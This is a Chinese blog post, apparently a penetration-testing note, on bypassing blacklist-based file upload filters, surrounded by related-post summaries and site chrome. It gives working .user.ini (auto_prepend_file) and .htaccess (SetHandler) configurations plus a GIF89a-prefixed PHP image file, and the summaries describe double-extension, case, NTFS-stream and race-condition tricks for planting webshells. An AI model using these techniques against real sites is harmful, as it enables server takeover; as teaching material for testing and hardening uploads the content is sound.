黑名单文件上传绕过

文件上传绕过方法汇总 先上传1.php,它的目的是让服务器上的php来创建一个2.php,我们在1.php被删除之前访问到他,就可以在服务器中创建2.php,2.php是一个木马文件,但是这个是系统自身创建的,所以不会被删除。假如我不断的上传发包,然后我同时也不断的访问那个我们上传上去的文件的地址,我们就开始和服务器的函数比手速了,函数执行都是要时间的,如果我这边上传上去,且没有删除,那个时间可能很短,然后被我访问到了,岂不是就可以执行PHP了。 阅读详情

黑名单文件上传绕过

  • 我在西北,一山又一山。与你相隔,一关又一关。

漏洞概述:

  • .htaccess用于Apache
  • .user.ini用于php

漏洞复现:

  • .user.ini
    原理:
    .user.ini将所有php文件自动包含任意木马文件执行。
    使用条件:
    只要以cgi/FastCGI/fpm模式运行的php,并且上传目录下要有正常可执行的php文件,都可以成功包含

    上传1.user.ini

auto_prepend_file=1.jpg

然后上传1.jpg

GIF89a
<?php
phpinfo();
?>

访问正常php文件,即可成功包含
在这里插入图片描述

  • .htaccess

前提apache,需要开启

 Options FollowSymLinks
 AllowOverride All 
 LoadModule rewrite_module modules/mod_rewrite.so

然后上传1.htaccess

<FilesMatch "1.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

访问1.jpg即可执行php

**余生很长,请多指教。**

在这里插入图片描述

文件上传黑名单绕过 黑名单绕过方法: 1、大小写绕过 windows对大小写不敏感,所以上传大小写混写的php进行绕过 (因为后端一般验证后缀字符串是否和‘php’相等,(前提是没有将你传入的字符串进行小写转换后再对比),大写字母和小写字母肯定不相等,所以可以利用这一点进行绕过,又因为windows对大小写不敏感,所以.PhP文件被当成php文件解析) 2、重写绕过: 服务端将黑名单的后缀名替换为空,但是仅替换一次,所以可以上传.phphp p后缀,替换后就成了.php 3、特殊可解析后缀绕过黑名单规则不严谨,在某些特定. 阅读详情

相关推荐

文件上传漏洞黑名单绕过

NTFS储存数据流的一个属性,这样我们去访问的时候,我们请求的会被它认为是 phpinfo.php 本身的数据。有时会直接检测你上传的文件,如果你上传了上面规定的文件,他会把你的后缀名去掉,但是他只会过滤一次,这时我们可以用双写进行绕过,只要写两个php就行了,pphphp将php过滤后还剩下php,即可上传成功。然后我们就可以先上传一个.jpg的图片马,然后再上传.htaccess的文件,然后在有.htaccess的文件夹内.jpg就会被解析为.php的文件,然后上传的图片马就可以发挥作用了。

qq_51331767的博客 1102

【每日渗透笔记】文件上传绕过尝试

文件上传】白名单

4479

文件上传-后端黑名单绕过

文件上传漏洞之后端绕过黑名单

你们de4月天的博客 1569

文件上传-绕过黑名单验证

基于文件后缀名验证介绍 对于文件上传模块来说,尽量避免上传可执行的脚本文件。为了防止上传脚本需要设置对应的验证方式。 基于文件后缀名验证方式分类: 1、基于白名单验证:只针对白名单中有的后缀名,文件才能上传成功。 2、基于黑名单验证:只针对黑名单中没有的后缀名,文件才能上传成功。 基于黑名单验证代码片段分析 对于黑名单中的后缀名筛选。绕过黑名单可以通过寻找"漏网之鱼",寻找某些可以被作为脚本执行同...

qq_25899635的博客 8881

文件上传后端黑名单白名单绕过

大家好! 我是小黄,很高兴又跟大家见面啦 ! 拒绝水文,从我做起 !!!! 未经允许,禁止转载 ,违者必究!!!! 本实验仅适用于学习和测试 ,严禁违法操作 ! ! ! 今天更新的是: 文件上传后端黑名单白名单绕过 微信公众号回复:【靶机】,即可获取本文全部涉及到的工具。 创建时间:2021年6月23日 软件: MindMaster Pro、kali、DriftingBlues:7靶机 文件上传后端黑名单白名单绕过一、文件上传常见验证:客户端验证:客户端校验服务端验证:后缀名:黑名单、白名

在下小黄的博客 4040

文件上传漏洞 黑名单绕过

文件类型绕过的核心是:前端验证靠禁用JS绕过,后端MIME验证靠抓包改Content-Type绕过。两者都是因为服务端没有做足够严格的校验(如白名单后缀、文件内容检测),才给了攻击者可乘之机。绕过方式核心原理适用环境关键前提同解析后缀利用服务器支持的其他可执行后缀Apache/IIS黑名单不全.htaccess修改目录配置,强制解析任意后缀Apache允许上传.htaccess大小写绕过匹配时未统一转小写通用代码未做大小写归一化空格/点/下划线Windows系统特性 + 代码未trim。

dfdheh的博客 357

深入剖析文件上传黑名单、白名单与数组绕过技巧

在 Web 安全领域,文件上传功能是一个常见却又充满安全风险的点。其中,黑名单和白名单机制是服务端控制文件上传类型的重要手段,而针对它们的绕过技巧更是渗透测试和安全防护中需要深入研究的内容。本文将结合具体代码示例,全面地探讨这些技术点。

m0_57836225的博客 2208

文件上传-黑名单绕过4

对于黑名单绕过是最容易理解的一种绕过方式,只要可以突破上传点没有限制到的后缀名即可上传成功。对于黑名单绕过是最容易理解的一种绕过方式,只要可以突破上传点没有限制到的后缀名即可上传成功。至于如何知晓哪些后缀没有被限制,可以使用 burpsuite 批量上传来测试后缀名。在测试上传点时,只要上传点忽略了其中一点,我们就能够上传可以解析的php文件;在测试上传点时,只要上传点忽略了其中一点,我们就能够上传可以解析的php文件;在测试上传点时,只要上传点忽略了其中一点,我们就能够上传可以解析的php文件;

疯狂小伟哥的博客 718

文件上传漏洞基础/content-type绕过/黑名单绕过/

有些上传模块,会对http的类型头进行检测,如果是图片类型,允许上传文件到服务器,否则返回上传失败。在后端检测了上传文件的content-type是不是图片格式,也就是说,我们前面用的删掉前端函数,直接上传方式是用不了的,我们需要发送数据包中的content-type为image/png。①修改脚本后缀,上传,抓包中修改后缀(因为上传的就是图片,所以content-type就是image/png)②直接上传脚本,抓包中直接修改conent-type。②直接上传脚本修改content-type。

ChenD的学习笔记 7218

文件上传-黑名单关键字绕过

对于黑名单绕过是最容易理解的一种绕过方式,只要可以突破上传点没有限制到的后缀名即可上传成功。至于如何知晓哪些后缀没有被限制,可以使用 burpsuite 批量上传来测试后缀名。F12或者邮件审查元素,打开控制台,使用该按钮点击图片,可以发现图片上传位置;在测试上传点时,只要上传点忽略了其中一点,我们就能够上传可以解析的php文件;该配置模块规定了哪些后缀可以被视为php文件解析;访问php3后缀文件,成功解析为php。2、对于上传点的测试思路。上传1.php文件并抓包。复制文件后缀,开始爆破;

疯狂小伟哥的博客 627

upload-labs文件上传靶场 · 黑名单绕过十式 (前十关详解)

本文内容仅供网络安全学习与技术交流使用,所有操作均在本地搭建的靶场环境中完成。请勿将文中技术用于任何非法用途,否则后果自负文件上传漏洞的绕过方式,往往就藏在开发者的“疏忽”里。最近在肝上传靶场,前10关分别对应10种经典绕过思路。没有重复造轮子,每一关都是一次新的奇技淫巧下面直接上每一关的思路过程。

2403_88276249的博客 213

文件上传之.htaccess绕过黑名单——upload-labs靶场第四关

今天继续给大家介绍渗透测试相关知识,本文主要内容是介绍.htaccess绕过黑名单文件上传方法,并借助upload-labs靶场的第四关进行了实战。 一、.htaccess绕过简介 二、upload-labs靶场第四关简介 三、upload-labs靶场第四关实战

永远是少年 3223

文件上传漏洞(一)之黑名单检测绕过

一.文件上传漏洞之黑名单过滤不全  准备上传一句话PHP文件,用burp抓包之后,去修改上传文件的后缀名,依次去尝试,对于黑名单策略(限制某一些文件格式),我们可以上传类似可以解析的文件,绕过黑名单,而其他可作为php脚本执行的其他后缀格式有php4,php5,phtml 二.(.htaccess文件绕过) 概况来说,.htaccess文件时Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以实现网页301重定向,自

一醉一休的博客 5325

文件上传绕过】三、黑名单不全绕过

文章目录一、描述二、实验原理三、检测代码四、添加黑名单中未做限制的后缀进行绕过 一、描述 Web系统可能会采用黑名单的方式进行过滤。而过滤的方式存在一定的缺陷,比如存在过滤的黑名单不全,未考虑大小写,以及对上传文件名单次进行敏感字符清除。 二、实验原理 当下流行的网站开发语言均存在多个可解析后缀,例如asp脚本语言的可解析后缀,不仅仅是.asp,还有.cer,.asa等等。而由于开发人员相关知识或安全意识的局限性(欠缺),导致设置的黑名单不全。这时就可以通过其他可解析后缀绕过黑名单上传可执行的websh

ssrf 2412

文件上传黑名单绕过

这一次过滤的更加彻底一些了,.htaccess格式的文件也做了过滤(最后一个,这里不好截图),但是也有一个缺点,没有统一后缀名,所以我们可以构造Php这种写法的后缀名来绕过黑名单过滤,没有特殊配置的情况下绕过方法对linux操作系统的服务器无法实现绕过,因为linux不区分大小写,只有Windows会忽略大小写,上传如下格式的文件至服务器中。这个时候我们上传的shell.jpg被当作php解析了,为了后面的操作,我们最好是先回到更目录,清除一下上传的文件。

weixin_54105551的博客 1565

Web安全实战:5种文件上传漏洞绕过技巧(附.phtml黑名单绕过案例)

本文深入解析Web安全中文件上传漏洞的5种实用绕过技巧,重点介绍.phtml黑名单绕过案例。通过实战演示和防御策略分析,帮助开发者理解黑名单过滤机制的缺陷,并提供白名单验证、多维度检测等安全建议,提升Web应用的文件上传安全性。

weixin_29315091的博客 405

文件上传漏洞攻防:从黑名单绕过到实战Flag获取

本文深入剖析了文件上传漏洞的攻防技术,重点讲解了如何绕过黑名单过滤等核心攻击手段。文章从基础的前端绕过、Content-Type伪造,到高级的文件头伪装、.htaccess利用及竞争条件攻击,系统梳理了漏洞利用链条,并结合CTF实战案例演示了如何通过黑名单绕过获取Flag,最后为开发者提供了多层次纵深防御的安全编码清单。

weixin_28607671的博客 365
上一篇: sudo提权漏洞(CVE-2019-14287)
下一篇: Tomcat AJP 文件包含漏洞(CVE-2020-1938)
SoulCat.
博客等级 码龄16年 206粉丝 45原创
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值